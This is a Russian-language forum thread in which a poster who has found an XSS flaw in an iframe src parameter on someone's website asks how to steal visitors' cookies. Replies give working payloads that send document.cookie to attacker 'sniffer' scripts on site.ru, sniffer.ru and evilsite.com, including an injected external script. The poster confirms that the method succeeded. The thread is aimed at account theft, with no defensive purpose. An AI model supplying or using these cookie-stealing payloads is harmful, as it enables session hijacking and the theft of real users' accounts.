Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал:( Можно ли как-то красть куки через данную уязвимость?

Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал:( Можно ли как-то красть куки через данную уязвимость?
<iframe src="http://site.ru/sniffer.php?с='+document.cookie+'" style="display:none;"></iframe>

<iframe src="http://site.ru/sniffer.php='+document.cookie+'" style="display:none;"></iframe>
Как мне кажется у вас ошибка.
если после php оставить = то ничего не выводится.
если после php поставить например ?c= то выводится: c='+document.cookie+'

В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "

scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.

В src разве сработает document.cookie? Ведь надо писать что-то типа src="javascript:blablabla document.cookie "
Сработает

<iframe src="javascript:x=document.createElement('script');x.sr c='http://sniffer.ru/xss.js';document.body.appendChild(x);" style="display:none;"></iframe>

попробуй так

и так работает
<iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>

Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки.
satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.